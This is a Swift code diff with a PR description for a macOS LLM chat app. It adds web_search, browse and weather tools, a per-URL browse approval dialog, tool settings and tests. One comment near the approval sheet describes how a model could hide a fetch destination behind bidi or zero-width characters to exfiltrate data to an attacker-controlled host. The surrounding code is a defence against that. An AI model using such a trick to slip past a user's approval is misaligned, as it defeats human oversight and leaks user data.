+    /// Clears itself once every dispatched call has a result — the chips then
+    /// tell the whole story.
+    private var toolDispatchCaption: String? {
+        ChatMessage.toolDispatchPlaceholderCaption(
+            content: message.content,
+            reasoning: message.reasoning,
+            toolCalls: message.toolCalls,
+            settledToolCallIDs: Set(toolResults.keys)
+        )
     }
 
     private var reasoningDisclosure: some View {
@@ -688,6 +745,123 @@ private struct MessageRow: View {
             .font(.footnote)
             .foregroundStyle(.secondary)
             .frame(maxWidth: .infinity, alignment: .center)
+    }
+}
+
+/// One dispatched tool call, with its arguments and (once it lands) its
+/// result behind a disclosure. Expanded while the tool is still running so
+/// the user sees what is happening; auto-collapses on success so a long
+/// transcript stays skimmable, and stays expanded on failure because the
+/// error detail is the useful part.
+private struct ToolCallChip: View {
+    let call: ToolCall
+    let result: ChatMessage?
+
+    /// Manual override. Tracks the user's last toggle so a click always wins
+    /// over the auto-collapse-on-success rule; without it, expanding a
+    /// completed chip would be silently re-collapsed on the next body pass.
+    @State private var userToggled: Bool = false
+    @State private var manualExpanded: Bool = false
+
+    private var expanded: Bool {
+        if userToggled { return manualExpanded }
+        guard let result else { return true }
+        return result.status == .failed
+    }
+
+    /// Pretty-printed if the model emitted real JSON, sanitised raw string if
+    /// not — smaller models occasionally drop unparseable junk in here.
+    private var prettyArguments: String {
+        let raw = call.function.arguments
+        guard !raw.isEmpty else { return "(no arguments)" }
+        guard let data = raw.data(using: .utf8),
+              let obj = try? JSONSerialization.jsonObject(with: data),
+              let pretty = try? JSONSerialization.data(
+                withJSONObject: obj,
+                options: [.prettyPrinted, .sortedKeys]
+              ),
+              let str = String(data: pretty, encoding: .utf8) else {
+            return ChatTextSanitizer.sanitizeForDisplay(raw)
+        }
+        return ChatTextSanitizer.sanitizeForDisplay(str)
+    }
+
+    /// A failed result renders its stable diagnosis, never the raw tool
+    /// payload — that stays in the model's context, not on screen.
+    private var resultBody: String? {
+        guard let result else { return nil }
+        if result.status == .failed {
+            return result.toolFailureDiagnosis(toolName: call.function.name).message
+        }
+        return ChatTextSanitizer.sanitizeForDisplay(result.content)
+    }
+
+    private var statusIcon: String {
+        guard let result else { return "ellipsis.circle" }
+        return result.status == .failed ? "exclamationmark.octagon.fill" : "checkmark.circle.fill"
+    }
+
+    private var statusColor: Color {
+        guard let result else { return .secondary }
+        return result.status == .failed ? RapidTheme.statusError : .green
+    }
+
+    var body: some View {
+        VStack(alignment: .leading, spacing: 0) {
+            Button {
+                userToggled = true
+                manualExpanded = !expanded
+            } label: {
+                HStack(spacing: 8) {
+                    Image(systemName: "wrench.and.screwdriver.fill")
+                        .font(.system(size: 11))
+                        .foregroundStyle(RapidTheme.brand)
+                    Text(ChatTextSanitizer.sanitizeForDisplay(call.function.name))
+                        .font(.system(size: 12, weight: .medium, design: .monospaced))
+                    Spacer(minLength: 0)
+                    Image(systemName: statusIcon)
+                        .font(.system(size: 11))
+                        .foregroundStyle(statusColor)
+                    Image(systemName: expanded ? "chevron.up" : "chevron.down")
+                        .font(.system(size: 10))
+                        .foregroundStyle(.tertiary)
+                }
+                .padding(.vertical, 6)
+                .padding(.horizontal, 10)
+                .frame(maxWidth: .infinity, alignment: .leading)
+            }
+            .buttonStyle(.plain)
+            .accessibilityLabel("Tool call \(call.function.name)")
+
+            if expanded {
+                VStack(alignment: .leading, spacing: 6) {
+                    Divider()
+                    Text(prettyArguments)
+                        .font(.system(size: 11, design: .monospaced))
+                        .foregroundStyle(.secondary)
+                        .textSelection(.enabled)
+                        .frame(maxWidth: .infinity, alignment: .leading)
+                    if let body = resultBody {
+                        Divider()
+                        Text(body)
+                            .font(.system(size: 11, design: .monospaced))
+                            .foregroundStyle(result?.status == .failed ? RapidTheme.statusError : .secondary)
+                            .textSelection(.enabled)
+                            .frame(maxWidth: .infinity, alignment: .leading)
+                    }
+                }
+                .padding(.horizontal, 10)
+                .padding(.bottom, 8)
+            }
+        }
+        .background(
+            RoundedRectangle(cornerRadius: RapidTheme.Radius.input, style: .continuous)
+                .fill(RapidTheme.surfaceRaised)
+        )
+        .overlay(
+            RoundedRectangle(cornerRadius: RapidTheme.Radius.input, style: .continuous)
+                .strokeBorder(RapidTheme.hairline, lineWidth: 1)
+        )
     }
 }
 

--- a/apps/rapid-mac/Sources/Rapid/UI/ContentView.swift
+++ b/apps/rapid-mac/Sources/Rapid/UI/ContentView.swift
@@ -18,6 +18,7 @@ struct ContentView: View {
     @Environment(SamplingConfig.self) private var sampling
     @Environment(UpdateChecker.self) private var updater
     @Environment(QuickstartCoordinator.self) private var quickstart
+    @Environment(BrowseApprovalStore.self) private var browseApproval
 
     @State private var alias: String = ""
     /// Which detail surface the sidebar shows (chat vs the Launch page).
@@ -233,6 +234,10 @@ struct ContentView: View {
         .sheet(isPresented: quickstartSheetPresented) {
             quickstartSheet
         }
+        // Per-fetch approval for the ``browse`` tool. Skipped entirely when
+        // the user has turned on auto-approve in Settings (resolved before a
+        // request is ever published), so it only appears on a real prompt.
+        .modifier(BrowseApprovalDialog(store: browseApproval))
         .task { await runLaunchAutoStart() }
     }
 
@@ -605,6 +610,79 @@ struct ContentView: View {
         case .idle, .stopped, .crashed:
             return .chat(serverReady: false)
         }
+    }
+}
+
+/// Approval dialog for the ``browse`` tool: present while a request is
+/// pending, deny on external dismiss (Esc / click-outside) so a suspended
+/// tool can never hang waiting on a sheet the user has closed. There is no
+/// per-URL "always allow" — URLs vary each call; unattended users flip
+/// **Auto-approve browsing** in Settings → Tools.
+private struct BrowseApprovalDialog: ViewModifier {
+    let store: BrowseApprovalStore
+
+    func body(content: Content) -> some View {
+        content.sheet(isPresented: Binding(
+            get: { store.pendingRequest != nil },
+            set: { if !$0 && store.pendingRequest != nil { store.answer(.deny) } }
+        )) {
+            if let req = store.pendingRequest {
+                BrowseApprovalSheet(request: req, store: store)
+            }
+        }
+    }
+}
+
+/// URL approval sheet for ``browse``. The complete URL is shown display-safe
+/// (so a model can't hide the real destination behind bidi / zero-width
+/// scalars past the one-line preview) and the host is called out so the user
+/// judges *where* the request goes. It is only a read-only GET whose body
+/// returns to the model — but the model picks the URL, so approving the exact
+/// destination is what stops silent exfiltration to an attacker-controlled
+/// host.
+private struct BrowseApprovalSheet: View {
+    let request: BrowseApprovalStore.PendingApproval
+    let store: BrowseApprovalStore
+
+    var body: some View {
+        VStack(alignment: .leading, spacing: 14) {
+            Text("Fetch this web page?")
+                .font(.headline)
+            Text("The model wants to fetch content from:")
+                .font(.callout)
+                .foregroundStyle(.secondary)
+
+            Text(BrowseApprovalStore.displaySafe(request.host))
+                .font(.system(.body, design: .monospaced).weight(.semibold))
+                .textSelection(.enabled)
+
+            ScrollView {
+                Text(BrowseApprovalStore.displaySafe(request.fullURL))
+                    .font(.system(.callout, design: .monospaced))
+                    .textSelection(.enabled)
+                    .frame(maxWidth: .infinity, alignment: .leading)
+                    .padding(10)
+            }
+            .frame(minHeight: 44, maxHeight: 140)
+            .background(Color(nsColor: .textBackgroundColor))
+            .overlay(RoundedRectangle(cornerRadius: 6).stroke(.quaternary))
+            .clipShape(RoundedRectangle(cornerRadius: 6))
+
+            Text("The page's text is sent back to the model. Only http/https "
+                + "public addresses are allowed — private and local addresses are blocked.")
+                .font(.caption)
+                .foregroundStyle(.secondary)
+
+            HStack {
+                Spacer()
+                Button("Don't allow") { store.answer(.deny) }
+                    .keyboardShortcut(.cancelAction)
+                Button("Allow once") { store.answer(.allowOnce) }
+                    .keyboardShortcut(.defaultAction)
+            }
+        }
+        .padding(20)
+        .frame(width: 460)
     }
 }
 

--- a/apps/rapid-mac/Sources/Rapid/UI/SettingsToolsPanel.swift
+++ b/apps/rapid-mac/Sources/Rapid/UI/SettingsToolsPanel.swift
@@ -1,0 +1,262 @@
+import SwiftUI
+
+/// Settings → Tools. Owns everything about the built-in tools the model can
+/// call:
+///
+///   * Per-tool on/off switches (persisted in ``UserDefaults`` by
+///     ``ChatViewModel.setToolEnabled``). A disabled tool is stripped from the
+///     request body AND refused at dispatch, so a model that names it anyway
+///     gets a clean error instead of a silent run.
+///   * The ``web_search`` backend + its API key. Keys live in the Keychain
+///     (``WebSearchConfig``), never in UserDefaults.
+///   * The ``browse`` approval mode — per-fetch prompt (default) or
+///     auto-approve for unattended use.
+struct SettingsToolsPanel: View {
+    @Environment(ChatViewModel.self) private var chat
+    @Environment(WebSearchConfig.self) private var webSearch
+    @Environment(BrowseApprovalStore.self) private var browseApproval
+
+    /// Draft of the API key field. Committed on Return or Save so we don't
+    /// write to the Keychain on every keystroke.
+    @State private var keyDraft: String = ""
+    @State private var keyDraftEdited: Bool = false
+    @State private var saveFeedback: SettingsView.WebSearchKeySaveFeedback?
+    @State private var feedbackGeneration: Int = 0
+
+    var body: some View {
+        VStack(alignment: .leading, spacing: 20) {
+            toolsSection
+            webSearchSection
+            browseSection
+        }
+        .task {
+            // Warm the Keychain cache off the main actor before the key rows
+            // render — a cold `SecItemCopyMatching` crosses securityd XPC and
+            // can stall the panel's first paint.
+            await webSearch.prefetchAllAPIKeys()
+        }
+    }
+
+    // MARK: - Available tools
+
+    private var toolsSection: some View {
+        VStack(alignment: .leading, spacing: 8) {
+            header(
+                "Tools",
+                "Tools the model can call during a chat. Turn one off and it is never offered — and never runs, even if the model asks for it by name."
+            )
+            card {
+                VStack(alignment: .leading, spacing: 12) {
+                    ForEach(chat.tools.definitions, id: \.function.name) { def in
+                        Toggle(isOn: toolBinding(def.function.name)) {
+                            HStack(alignment: .top, spacing: 10) {
+                                Image(systemName: Self.glyph(for: def.function.name))
+                                    .foregroundStyle(RapidTheme.brand)
+                                    .frame(width: 18)
+                                VStack(alignment: .leading, spacing: 2) {
+                                    Text(def.function.name)
+                                        .font(.system(size: 12, weight: .medium, design: .monospaced))
+                                    Text(def.function.description)
+                                        .font(.caption)
+                                        .foregroundStyle(.secondary)
+                                        .fixedSize(horizontal: false, vertical: true)
+                                }
+                            }
+                        }
+                        .toggleStyle(TrailingSettingsToggleStyle())
+                    }
+                }
+            }
+        }
+    }
+
+    private func toolBinding(_ name: String) -> Binding<Bool> {
+        Binding(
+            get: { !chat.disabledTools.contains(name) },
+            set: { chat.setToolEnabled(name, $0) }
+        )
+    }
+
+    // MARK: - Web search
+
+    private var webSearchSection: some View {
+        @Bindable var config = webSearch
+        return VStack(alignment: .leading, spacing: 8) {
+            header(
+                "Web search",
+                "Which backend `web_search` queries. DuckDuckGo needs no account but is rate-limited; the keyed backends are more reliable."
+            )
+            card {
+                VStack(alignment: .leading, spacing: 14) {
+                    Picker("Backend", selection: $config.provider) {
+                        ForEach(WebSearchProvider.allCases) { provider in
+                            Text(provider.displayName).tag(provider)
+                        }
+                    }
+                    .pickerStyle(.radioGroup)
+                    .labelsHidden()
+                    .onChange(of: config.provider) { _, _ in
+                        resetKeyDraft()
+                    }
+
+                    Text(config.provider.subtitle)
+                        .font(.caption)
+                        .foregroundStyle(.secondary)
+                        .fixedSize(horizontal: false, vertical: true)
+
+                    if config.provider.requiresKey {
+                        keyField(for: config.provider)
+                    }
+                }
+            }
+        }
+    }
+
+    @ViewBuilder
+    private func keyField(for provider: WebSearchProvider) -> some View {
+        VStack(alignment: .leading, spacing: 6) {
+            HStack(spacing: 8) {
+                SecureField("API key", text: $keyDraft)
+                    .textFieldStyle(.roundedBorder)
+                    .onChange(of: keyDraft) { _, _ in keyDraftEdited = true }
+                    .onSubmit { commitKey(for: provider) }
+                Button("Save") { commitKey(for: provider) }
+                    .disabled(!keyDraftEdited)
+            }
+            if let url = provider.keyDashboardURL {
+                Link("Get a \(provider.displayName) key", destination: url)
+                    .font(.caption)
+            }
+            if let feedback = saveFeedback {
+                Text(Self.feedbackCopy(feedback))
+                    .font(.caption)
+                    .foregroundStyle(Self.isFailure(feedback) ? RapidTheme.statusError : .secondary)
+            } else if webSearch.cachedKeyState(for: provider).hasKey {
+                Text("A key is stored for \(provider.displayName).")
+                    .font(.caption)
+                    .foregroundStyle(.secondary)
+            } else {
+                Text("No key stored — searches fall back to DuckDuckGo until you save one.")
+                    .font(.caption)
+                    .foregroundStyle(.secondary)
+            }
+        }
+        .onAppear { resetKeyDraft() }
+    }
+
+    private func commitKey(for provider: WebSearchProvider) {
+        feedbackGeneration += 1
+        let generation = feedbackGeneration
+        switch SettingsView.webSearchKeyCommitAction(draft: keyDraft, wasEdited: keyDraftEdited) {
+        case .unchanged:
+            saveFeedback = nil
+            return
+        case .clear:
+            let ok = webSearch.setAPIKey(nil, for: provider)
+            saveFeedback = ok ? .cleared(generation: generation) : .writeFailed(generation: generation)
+            // A failed Keychain write keeps the draft so the "try again" advice
+            // is actually followable — the user would otherwise have to
+            // re-paste a secret they no longer have on the clipboard.
+            if SettingsView.shouldResetWebSearchKeyDraftAfterCommit(keychainWriteSucceeded: ok) {
+                resetKeyDraft()
+            }
+        case .save(let value):
+            let ok = webSearch.setAPIKey(value, for: provider)
+            saveFeedback = ok ? .saved(generation: generation) : .writeFailed(generation: generation)
+            if SettingsView.shouldResetWebSearchKeyDraftAfterCommit(keychainWriteSucceeded: ok) {
+                resetKeyDraft()
+            }
+        }
+    }
+
+    /// Clear the draft back to empty. The stored secret is never echoed back
+    /// into the field — a SecureField pre-filled with the real key puts it one
+    /// screenshot away, and the row below already says whether one is stored.
+    private func resetKeyDraft() {
+        keyDraft = ""
+        keyDraftEdited = false
+    }
+
+    static func feedbackCopy(_ feedback: SettingsView.WebSearchKeySaveFeedback) -> String {
+        switch feedback {
+        case .saved: return "Saved to your Keychain."
+        case .cleared: return "Key removed."
+        case .writeFailed: return "Couldn't write to the Keychain. Try again."
+        }
+    }
+
+    static func isFailure(_ feedback: SettingsView.WebSearchKeySaveFeedback) -> Bool {
+        if case .writeFailed = feedback { return true }
+        return false
+    }
+
+    // MARK: - Browsing
+
+    private var browseSection: some View {
+        VStack(alignment: .leading, spacing: 8) {
+            header(
+                "Browsing",
+                "`browse` fetches a page and hands its text to the model. The model picks the URL, so by default you approve each destination first."
+            )
+            card {
+                Toggle(isOn: browseAutoApproveBinding) {
+                    VStack(alignment: .leading, spacing: 2) {
+                        Text("Approve every page automatically")
+                            .font(.callout.weight(.medium))
+                        Text("Skips the confirmation for unattended use. Private and local addresses stay blocked either way.")
+                            .font(.caption)
+                            .foregroundStyle(.secondary)
+                            .fixedSize(horizontal: false, vertical: true)
+                    }
+                }
+                .toggleStyle(TrailingSettingsToggleStyle())
+            }
+        }
+    }
+
+    private var browseAutoApproveBinding: Binding<Bool> {
+        Binding(
+            get: { browseApproval.mode == .autoApproveAll },
+            set: { browseApproval.mode = $0 ? .autoApproveAll : .ask }
+        )
+    }
+
+    // MARK: - Shared layout
+
+    @ViewBuilder
+    private func header(_ title: String, _ subtitle: String) -> some View {
+        VStack(alignment: .leading, spacing: 4) {
+            Text(title)
+                .font(.title3.weight(.semibold))
+            Text(subtitle)
+                .font(.callout)
+                .foregroundStyle(.secondary)
+                .fixedSize(horizontal: false, vertical: true)
+        }
+    }
+
+    @ViewBuilder
+    private func card<Content: View>(@ViewBuilder _ content: () -> Content) -> some View {
+        content()
+            .frame(maxWidth: .infinity, alignment: .leading)
+            .padding(16)
+            .background(
+                RoundedRectangle(cornerRadius: RapidTheme.cardRadius, style: .continuous)
+                    .fill(RapidTheme.card)
+            )
+            .clipShape(RoundedRectangle(cornerRadius: RapidTheme.cardRadius, style: .continuous))
+            .overlay(
+                RoundedRectangle(cornerRadius: RapidTheme.cardRadius, style: .continuous)
+                    .stroke(RapidTheme.hairline, lineWidth: 1)
+            )
+    }
+
+    static func glyph(for name: String) -> String {
+        switch name {
+        case "web_search": return "magnifyingglass"
+        case "browse": return "globe"
+        case "weather": return "cloud.sun"
+        default: return "wrench.and.screwdriver"
+        }
+    }
+}

--- a/apps/rapid-mac/Sources/Rapid/UI/SettingsView.swift
+++ b/apps/rapid-mac/Sources/Rapid/UI/SettingsView.swift
@@ -68,6 +68,9 @@ struct SettingsView: View {
         /// Issue #210 — file-manager-style cache inspector (what's on
         /// disk, what to delete or download).
         case modelManagement
+        /// Built-in tools the model can call: on/off per tool, the
+        /// web-search backend + key, and the browse approval mode.
+        case tools
         case appearance
         case privacy
         /// Rapid-MLX Desktop app updates. The .app self-update is the
@@ -79,6 +82,7 @@ struct SettingsView: View {
             switch self {
             case .models: return "Models"
             case .modelManagement: return "Model Management"
+            case .tools: return "Tools"
             case .appearance: return "Appearance"
             case .privacy: return "Privacy"
             case .app: return "App"
@@ -88,6 +92,7 @@ struct SettingsView: View {
             switch self {
             case .models: return "cylinder.split.1x2.fill"
             case .modelManagement: return "externaldrive.fill"
+            case .tools: return "wrench.and.screwdriver.fill"
             case .appearance: return "paintpalette.fill"
             case .privacy: return "lock.shield.fill"
             case .app: return "app.badge.fill"
@@ -321,6 +326,8 @@ struct SettingsView: View {
             SettingsModelsPanel()
         case .modelManagement:
             SettingsModelManagementPanel()
+        case .tools:
+            SettingsToolsPanel()
         case .appearance:
             appearancePanel
         case .privacy:

--- a/apps/rapid-mac/Tests/RapidTests/BuiltinToolsTests.swift
+++ b/apps/rapid-mac/Tests/RapidTests/BuiltinToolsTests.swift
@@ -1,0 +1,177 @@
+import Foundation
+import Testing
+@testable import Rapid
+
+/// Contracts for the built-in tool surface: what the registry exposes, what
+/// reaches the wire, and what is refused at dispatch.
+///
+/// The three shipped tools (``web_search``, ``browse``, ``weather``) are all
+/// network-facing, so the gates below are load-bearing rather than cosmetic:
+/// a tool stripped from the request body can STILL be named by a malformed
+/// model, and only the dispatch-side refusal stops it running.
+@MainActor
+@Suite("Built-in tools")
+final class BuiltinToolsTests {
+    nonisolated(unsafe) private var createdSuiteNames: [String] = []
+    deinit { TestDefaultsScope.cleanup(suiteNames: createdSuiteNames) }
+
+    private func freshDefaults() -> UserDefaults {
+        let name = TestDefaultsScope.mintSuiteName(prefix: "rapid-tools-test-")
+        createdSuiteNames.append(name)
+        let d = UserDefaults(suiteName: name)!
+        d.removePersistentDomain(forName: name)
+        return d
+    }
+
+    private func makeRegistry() -> BuiltinToolRegistry {
+        BuiltinToolRegistry(
+            browseApproval: BrowseApprovalStore(defaults: freshDefaults()),
+            webSearch: WebSearchConfig(defaults: freshDefaults(), keychain: InMemoryKeychain())
+        )
+    }
+
+    // MARK: - Registry surface
+
+    @Test("Registry exposes exactly web_search, browse, and weather")
+    func registryDefinitions() {
+        let names = makeRegistry().definitions.map { $0.function.name }
+        #expect(names == ["web_search", "browse", "weather"])
+    }
+
+    @Test("An unknown tool name returns an error result naming what IS available")
+    func unknownToolIsRefusedNotCrashed() async {
+        // A model that invents a name must get a recoverable error result, not
+        // a thrown error that tears the chat loop down.
+        let result = await makeRegistry().run(
+            ToolCall(id: "call_1", name: "read_file", arguments: "{}")
+        )
+        #expect(result.isError)
+        #expect(result.toolCallID == "call_1")
+        #expect(result.content.contains("web_search"))
+        #expect(result.content.contains("browse"))
+        #expect(result.content.contains("weather"))
+    }
+
+    @Test("Registry stamps the call id onto a result the tool produced without one")
+    func registryFillsToolCallID() async {
+        // Tools build their results before they know the id, so the registry
+        // is the single place that stamps it. A dropped id produces a
+        // ``role: "tool"`` row the model can't match to its call.
+        let result = await makeRegistry().run(
+            ToolCall(id: "call_xyz", name: "weather", arguments: "not json")
+        )
+        #expect(result.toolCallID == "call_xyz")
+        #expect(result.isError)
+    }
+
+    // MARK: - Per-tool enable/disable
+
+    @Test("A tool toggled off is stripped from the definitions sent to the model")
+    func disabledToolIsStrippedFromWire() {
+        let vm = ChatViewModel(tools: makeRegistry(), toolDefaults: freshDefaults())
+        #expect(vm.enabledDefinitions.count == 3)
+        vm.setToolEnabled("browse", false)
+        #expect(!vm.enabledDefinitions.contains { $0.function.name == "browse" })
+        #expect(vm.enabledDefinitions.count == 2)
+    }
+
+    @Test("Tool toggles persist across a fresh view model on the same defaults")
+    func toolToggleIsPersisted() {
+        let defaults = freshDefaults()
+        let first = ChatViewModel(tools: makeRegistry(), toolDefaults: defaults)
+        first.setToolEnabled("weather", false)
+
+        let second = ChatViewModel(tools: makeRegistry(), toolDefaults: defaults)
+        #expect(second.disabledTools.contains("weather"))
+        #expect(!second.enabledDefinitions.contains { $0.function.name == "weather" })
+    }
+
+    @Test("An untouched tool defaults to enabled so a shipped tool needs no opt-in")
+    func unsetToolDefaultsToEnabled() {
+        let vm = ChatViewModel(tools: makeRegistry(), toolDefaults: freshDefaults())
+        #expect(vm.disabledTools.isEmpty)
+    }
+
+    // MARK: - Dispatch refusal
+
+    @Test("A call for a tool that wasn't advertised this round is refused, not run")
+    func unadvertisedToolIsRefused() {
+        // Omitting a tool from the request body does NOT stop a malformed model
+        // emitting a call for it — this refusal is the gate that actually
+        // prevents the network fetch.
+        let refusal = ChatViewModel.toolRefusalMessage(
+            name: "browse",
+            disabledTools: ["browse"]
+        )
+        #expect(refusal != nil)
+        #expect(refusal?.contains("browse") == true)
+    }
+
+    @Test("A call for an advertised tool is allowed through")
+    func advertisedToolIsAllowed() {
+        #expect(ChatViewModel.toolRefusalMessage(name: "weather", disabledTools: []) == nil)
+        #expect(ChatViewModel.toolRefusalMessage(name: "weather", disabledTools: ["browse"]) == nil)
+    }
+
+    // MARK: - Broken-alias wire strip
+
+    @Test("Tools are stripped entirely for an alias known to mishandle tool calls")
+    func brokenAliasGetsNoTools() {
+        // Sending tools to a model empirically proven to ignore them produces a
+        // confidently-hallucinated answer with no chip to warn the user.
+        let enabled = makeRegistry().definitions
+        #expect(ChatViewModel.wireDefinitions(forAlias: "hermes3-8b-4bit", enabled: enabled).isEmpty)
+        #expect(ChatViewModel.wireDefinitions(forAlias: "qwen3.5-4b-4bit", enabled: enabled).count == 3)
+    }
+
+    // MARK: - Ambient guidance
+
+    @Test("The anti-confabulation preamble rides along only when tools are advertised")
+    func ambientGuidanceGatedOnTools() {
+        #expect(ChatViewModel.ambientSystemMessages(
+            historyOpensWithSystem: false,
+            toolsAdvertised: false
+        ).isEmpty)
+
+        let withTools = ChatViewModel.ambientSystemMessages(
+            historyOpensWithSystem: false,
+            toolsAdvertised: true
+        )
+        #expect(withTools.count == 1)
+        #expect(withTools.first?.role == .system)
+        #expect(withTools.first?.content == ChatViewModel.toolGuidancePreamble)
+    }
+
+    @Test("No second system row is injected when the transcript already opens with one")
+    func ambientGuidanceDefersToExistingSystemRow() {
+        // Two competing system messages is a documented chat-template foot-gun.
+        #expect(ChatViewModel.ambientSystemMessages(
+            historyOpensWithSystem: true,
+            toolsAdvertised: true
+        ).isEmpty)
+    }
+}
+
+/// Keychain double so the web-search key tests never touch the real login
+/// keychain (which would prompt, and would leak between runs).
+private final class InMemoryKeychain: KeychainStoring, @unchecked Sendable {
+    private let lock = NSLock()
+    private var store: [String: String] = [:]
+
+    func read(account: String) -> String? {
+        lock.lock(); defer { lock.unlock() }
+        return store[account]
+    }
+
+    func write(account: String, secret: String) -> Bool {
+        lock.lock(); defer { lock.unlock() }
+        store[account] = secret
+        return true
+    }
+
+    func delete(account: String) -> Bool {
+        lock.lock(); defer { lock.unlock() }
+        store.removeValue(forKey: account)
+        return true
+    }
+}


### PR DESCRIPTION
## What does this PR do?

  Adds built-in tool support to Rapid Mac and improves message-level chat interactions.

  - Adds `weather`, `web_search`, and `browse` tools.
  - Supports DuckDuckGo, Brave Search, and Tavily as search backends.
  - Stores provider API keys in macOS Keychain.
  - Adds tool enable/disable controls and browse approval settings.
  - Runs multi-round tool calls with dispatch validation and a bounded round limit.
  - Protects browsing requests with per-destination approval, redirect validation, response limits, caching, and SSRF checks for private or special-use addresses.
  - Converts fetched HTML into model-friendly Markdown.
  - Adds persistent Copy/Edit actions to user messages and Copy/Retry actions to assistant responses.
  - Makes Edit and Retry rewind the conversation to the selected message instead of always operating on the latest turn.
  - Hides irrelevant actions on tool-dispatch rows and reflects model readiness on Retry.
  - Accounts for macOS titlebar content insets when calculating transcript scroll bounds.

  ## Why is this needed?

  Rapid Mac models previously had no built-in way to retrieve current weather or web information without separately configuring external tools. This made answers about recent or changing information unreliable.

  The new tools provide a zero-setup path for weather and DuckDuckGo search, while supporting more reliable keyed search providers. Browsing is guarded because URLs are model-selected and could otherwise expose local services or private-network resources.

  The message-action changes also make longer conversations easier to correct and replay: users can edit an earlier prompt or retry a specific response without manually rebuilding the conversation. The scroll fix keeps short transcripts visible below the full-size macOS titlebar.

  ## Checklist

  - [x] Added focused tests for built-in tool contracts and message rewind behavior
  - [x] API keys are stored in Keychain rather than UserDefaults
  - [x] Disabled or unadvertised tools are rejected before dispatch
  - [x] Browse destinations and redirects are validated
  - [x] No breaking changes to existing API